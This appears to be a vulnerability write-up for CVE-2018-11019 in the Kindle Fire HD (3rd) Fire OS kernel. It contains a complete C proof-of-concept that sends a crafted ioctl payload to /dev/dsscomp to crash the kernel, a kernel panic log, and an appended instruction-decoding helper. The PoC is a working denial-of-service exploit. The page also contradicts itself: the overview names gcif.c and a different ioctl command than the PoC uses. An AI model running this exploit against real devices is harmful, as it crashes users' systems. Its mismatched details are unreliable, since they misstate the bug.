(CVE-2018-11019) Amazon Kindle Fire HD (3rd) Fire OS kernel component security vulnerability.docx

Uploaded by: 李司机  Document ID: 6068764  Uploaded: 2023-09-19  Format: DOCX  Pages: 10  Size: 24.72KB

(CVE-2018-11019) Amazon Kindle Fire HD (3rd) Fire OS kernel component security vulnerability

1. Vulnerability overview

Amazon Kindle Fire HD (3rd) is a Fire OS tablet device from the US company Amazon. Fire OS is the Android-based mobile operating system that runs on it, built specifically for Amazon devices. kernel is one of its kernel components.

In Fire OS 4.5.5.3 on the Amazon Kindle Fire HD (3rd), the file kernel/omap/drivers/misc/gcx/gcioctl/gcif.c in the kernel component contains a security vulnerability. An attacker can exploit it by using command 3221773726 to inject crafted arguments, causing a kernel crash.

2. Affected versions

Fire OS 4.5.5.3

3. Reproduction

PoC

    /*
     * This is poc of Kindle Fire HD 3rd
     * A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517.
     * Related buggy struct name is dsscomp_setup_dispc_data.
     * This Poc should run with permission to do ioctl on /dev/dsscomp.
     * The following is kmsg of kernel crash information:
     */
    #include <stdio.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <sys/ioctl.h>

    const static char *driver = "/dev/dsscomp";
    static unsigned int command = 1118064517;

    int main(int argc, char **argv, char **env) {
        /* Raw words passed to the ioctl as the dsscomp_setup_dispc_data argument. */
        unsigned int payload[] = {
            0xffffffff, 0x00000003, 0x5d200040, 0x79900008, 0x8f5928bd, 0x78b02422,
            0x00000000, 0xffffffff, 0xf4c50400, 0x007fffff, 0x8499f562, 0xffff0400,
            0x001b131d, 0x60818210, 0x00000007, 0xffffffff, 0x00000000, 0x9da9041c,
            0xcd980400, 0x001f03f4, 0x00000007, 0x2a34003f, 0x7c80d8f3, 0x63102627,
            0xc73643a8, 0xa28f0665, 0x00000000, 0x689e57b4, 0x01ff0008, 0x5e7324b1,
            0xae3b003f, 0x0b174d86, 0x00000400, 0x21ffff37, 0xceb367a4, 0x00000040,
            0x00000001, 0xec000f9e, 0x00000001, 0x000001ff, 0x00000000, 0x00000000,
            0x0000000f, 0x0425c069, 0x038cc3be, 0x0000000f, 0x00000080, 0xe5790100,
            0x5b1bffff, 0x0000d355, 0x0000c685, 0xa0070000, 0x0010ffff, 0x00a0ff00,
            0x00000001, 0xff490700, 0x0832ad03, 0x00000006, 0x00000002, 0x00000001,
            0x81f871c0, 0x738019cb, 0xbf47ffff, 0x00000040, 0x00000001, 0x7f190f33,
            0x00000001, 0x8295769b, 0x0000003f, 0x869f2295, 0xffffffff, 0xd673914f,
            0x05055800, 0xed69b7d5, 0x00000000, 0x107ebbd, 0xd214af8d, 0xffff4a93,
            0x26450008, 0x58df0000, 0xd16db084, 0x03ff30dd, 0x00000001, 0x209aff3b,
            0xe7850800, 0x00000002, 0x30da815c, 0x426f5105, 0x0de109d7, 0x2c1a65fc,
            0xfcb3d75f, 0x00000000, 0x00000001, 0x8066be5b, 0x00000002, 0xffffffff,
            0x5cf232ec, 0x680d1469, 0x00000001, 0x00000020, 0xffffffff, 0x00000400,
            0xd1d12be8, 0x02010200, 0x01ffc16f, 0xf6e237e6, 0x007f0000, 0x01ff08f8,
            0x000f00f9, 0xbad07695, 0x00000000, 0xbaff0000, 0x24040040, 0x00000006,
            0x00000004, 0x00000000, 0xbc2e9242, 0x009f5f08, 0x00800000, 0x00000000,
            0x00000001, 0xff8800ff, 0x00000001, 0x00000000, 0x000003f4, 0x6faa8472,
            0x00000400, 0xec857dd5, 0x00000000, 0x00000040, 0xffffffff, 0x3f004874,
            0x0000b77a, 0xec9acb95, 0xfacc0001, 0xffff0001, 0x0080ffff, 0x3600ff03,
            0x00000001, 0x8fff7d7f, 0x6b87075a, 0x00000000, 0x41414141, 0x41414141,
            0x41414141, 0x41414141, 0x001001ff, 0x00000000, 0x00000001, 0xff1f0512,
            0x00000001, 0x51e32167, 0xc18c55cc, 0x00000000, 0xffffffff, 0xb4aaf12b,
            0x86edfdbd, 0x00000010, 0x0000003f, 0xabff7b00, 0xffff9ea3, 0xb28e0040,
            0x000fffff, 0x458603f4, 0xffff007f, 0xa9030f02, 0x00000001, 0x002cffff,
            0x9e00cdff, 0x00000004, 0x41414141, 0x41414141, 0x41414141, 0x41414141
        };
        int fd = 0;

        fd = open(driver, O_RDWR);
        if (fd < 0) {
            /* open failed; the page's error branch writes to /data/local/tmp/log */
            perror("open");
            return -1;
        }
        printf("Try open %s with command 0x%x.\n", driver, command);
        printf("System will crash and reboot.\n");
        if (ioctl(fd, command, &payload) < 0) {
            /* ioctl failed; the page's error branch writes to /data/local/tmp/log */
            perror("ioctl");
            return -1;
        }
        close(fd);
        return 0;
    }

Crash log

    [  164.793151] Unable to handle kernel NULL pointer dereference at virtual address 00000037
    [  164.802459] pgd = c26ec000
    [  164.805664] [00000037] *pgd=82f42831, *pte=00000000, *ppte=00000000
    [  164.813415] Internal error: Oops: 17 [#1] PREEMPT SMP ARM
    [  164.819458] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
    [  164.827239] CPU: 1    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
    [  164.834686] PC is at dev_ioctl+0x4ac/0x10c4
    [  164.839416] LR is at down_timeout+0x40/0x5c
    [  164.844146] pc : [<c03178e8>]    lr : [<c006e9b8>]    psr: 60000013
    [  164.844146] sp : c25a1e70  ip : c25a1e50  fp : c25a1f04
    [  164.857116] r10: 00000000  r9 : d8c0aca8  r8 : bed5c610
    [  164.863128] r7 : c0a25b50  r6 : c25a0000  r5 : bed5c610  r4 : 0000000f
    [  164.870391] r3 : 00001403  r2 : 00000000  r1 : 20000013  r0 : 00000000
    [  164.877807] Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
    [  164.885894] Control: 10c5387d  Table: 826ec04a  DAC: 00000015


    [  165.612121] Process gcioctl_poc (pid: 3932, stack limit = 0xc25a02f8)
    [  165.619445] Stack: (0xc25a1e70 to 0xc25a2000)
    [  165.743835] Backtrace:
    [  165.746856] (dev_ioctl+0x0/0x10c4) from (do_vfs_ioctl+0x8c/0x5b4)
    [  165.756256] (do_vfs_ioctl+0x0/0x5b4) from (sys_ioctl+0x74/0x84)
    [  165.765502] (sys_ioctl+0x0/0x84) from (ret_fast_syscall+0x0/0x30)
    [  165.774780]  r8:c0013e08 r7:00000036 r6:00000000 r5:00010e64 r4:bed5c638
    [  165.783203] Code: e2870038 ebf55c25 e3500000 1a0002e0 (e5943028)
    Board Information:
        Revision : 0001
        Serial : 0000000000000000
    SoC Information:
        CPU : OMAP4470
        Rev : ES1.0
        Type: HS
        Production ID: 0002B975-000000CC
        Die ID : 1CC60000-50002FFF-0B00935D-11007004
    [  165.844757] ---[ end trace aba846a2af6e75b7 ]---
    [  165.850097] Kernel panic - not syncing: Fatal exception
    [  165.856109] CPU0: stopping
    [  165.859252] Backtrace:
    [  165.862274] (dump_backtrace+0x0/0x10c) from (dump_stack+0x18/0x1c)
    [  165.871643]  r6:c09ddc50 r5:c09dc844 r4:00000000 r3:c0a0e950
    [  165.878784] (dump_stack+0x0/0x1c) from (handle_IPI+0x190/0x1c4)
    [  165.887908] (handle_IPI+0x0/0x1c4) from (gic_handle_irq+0x58/0x60)
    [  165.897399] (gic_handle_irq+0x0/0x60) from (__irq_svc+0x40/0x70)
    [  165.906707] Exception stack(0xd8dcfc38 to 0xd8dcfc80)
    [  165.912384] fc20: c153a9f8 00000000
    [  165.921600] fc40: 00000002 c153aa08 00000007 c153a9f8 d8d72210 b6eaf010 d8caee34 bab7375f
    [  165.930816] fc60: 00000001 d8dcfcac 0009eded d8dcfc80 c010a5b4 c010a5fc 20070013 ffffffff
    [  165.940032]  r6:ffffffff r5:20070013 r4:c010a5fc r3:c010a5b4
    [  165.947052] (follow_page+0x0/0x238) from (__get_user_pages+0x13c/0x3f0)
    [  165.957031] (__get_user_pages+0x0/0x3f0) from (get_user_pages+0x50/0x58)
    [  165.967102] (get_user_pages+0x0/0x58) from (get_user_pages_fast+0x64/0x7c)
    [  165.977233]  r4:d8caee3c
    [  165.980468] (get_user_pages_fast+0x0/0x7c) from (fuse_copy_fill+0x1bc/0x238)
    [  165.990905] (fuse_copy_fill+0x0/0x238) from (fuse_copy_one+0x38/0x68)
    [  166.000579]  r6:d8dcdb00 r5:d8dce000 r4:d8dcfe24 r3:00000000
    [  166.007690] (fuse_copy_one+0x0/0x68) from (fuse_dev_do_read+0x3e4/0x69c)
    [  166.017761]  r4:dd243c00
    [  166.020874] (fuse_dev_do_read+0x0/0x69c) from (fuse_dev_read+0x84/0x9c)
    [  166.030853] (do_
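
Added example (not part of the original document or of the PoC author's code): a small C triage helper that decodes the bracketed instruction word on the Code: line of the crash log (e5943028) and combines it with the register dump to recompute the address the kernel was accessing when it faulted. The type and function names are illustrative assumptions; the register values and the instruction word are copied from the oops above.

```c
#include <stdint.h>
#include <stdio.h>

/* Fields of an ARM (A32) LDR/STR with a 12-bit immediate offset. */
struct arm_ldst {
    int is_load;      /* L bit: 1 = LDR, 0 = STR */
    int rn, rd;       /* base and transfer register numbers */
    int32_t offset;   /* immediate, negated when the U bit is clear */
    int pre_indexed;  /* P bit: offset is applied before the access */
};

/* r0-r10, fp, ip, sp, lr, pc as printed in the oops on this page. */
static const uint32_t OOPS_REGS[16] = {
    0x00000000, 0x20000013, 0x00000000, 0x00001403,
    0x0000000f, 0xbed5c610, 0xc25a0000, 0xc0a25b50,
    0xbed5c610, 0xd8c0aca8, 0x00000000, 0xc25a1f04,
    0xc25a1e50, 0xc25a1e70, 0xc006e9b8, 0xc03178e8,
};

/* Returns 0 on success, -1 if insn is not an LDR/STR (immediate offset) encoding. */
int decode_ldst_imm(uint32_t insn, struct arm_ldst *out)
{
    if ((insn >> 28) == 0xf || ((insn >> 25) & 0x7) != 0x2)
        return -1;
    out->pre_indexed = (insn >> 24) & 1;
    out->is_load = (insn >> 20) & 1;
    out->rn = (insn >> 16) & 0xf;
    out->rd = (insn >> 12) & 0xf;
    out->offset = (int32_t)(insn & 0xfff);
    if (!((insn >> 23) & 1))
        out->offset = -out->offset;
    return 0;
}

/* Address the instruction accesses, given the register file from the oops. */
int fault_address(uint32_t insn, const uint32_t regs[16], uint32_t *addr)
{
    struct arm_ldst d;
    if (decode_ldst_imm(insn, &d) != 0)
        return -1;
    uint32_t base = regs[d.rn] + (d.rn == 15 ? 8 : 0);  /* pc reads as pc+8 */
    /* Post-indexed forms access [Rn] and add the offset afterwards. */
    *addr = d.pre_indexed ? base + (uint32_t)d.offset : base;
    return 0;
}

int main(void)
{
    uint32_t addr;
    if (fault_address(0xe5943028u, OOPS_REGS, &addr) == 0)  /* word in () on the Code: line */
        printf("accessed address: 0x%08x\n", (unsigned)addr);
    return 0;
}
```

The word decodes to ldr r3, [r4, #40]; with r4 = 0000000f the access lands at 0x00000037, the faulting address the kernel reports. The word 0x0000000f also occurs in the PoC payload.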
